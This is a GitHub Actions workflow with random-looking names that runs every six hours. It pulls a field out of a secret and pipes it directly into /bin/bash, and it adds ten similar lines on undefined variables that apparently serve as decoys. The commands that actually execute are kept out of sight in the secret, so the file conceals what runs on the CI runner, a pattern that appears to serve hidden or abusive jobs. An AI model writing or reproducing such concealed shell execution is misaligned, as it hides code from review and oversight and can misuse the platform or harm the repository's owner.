name: yezhenxnis

on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yezhenxnis
        env:
          cha7: ${{ secrets.cha7 }}
        run: |
          echo $cha7 | jq -r .xxkj2280 | /bin/bash
          echo $pru33144 | jq -r .rtvj62 | /bin/bash
          echo $r14 | jq -r .tiyhr929 | /bin/bash
          echo $wrxq1169 | jq -r .rsu0 | /bin/bash
          echo $n86 | jq -r .cet2728 | /bin/bash
          echo $efve4 | jq -r .hddq6263 | /bin/bash
          echo $nibpb24262 | jq -r .bnjl2 | /bin/bash
          echo $yrzu355 | jq -r .v0 | /bin/bash
          echo $prst4027 | jq -r .fn646 | /bin/bash
          echo $hzobl1 | jq -r .tot166 | /bin/bash
          echo $bj07 | jq -r .g42139 | /bin/bash

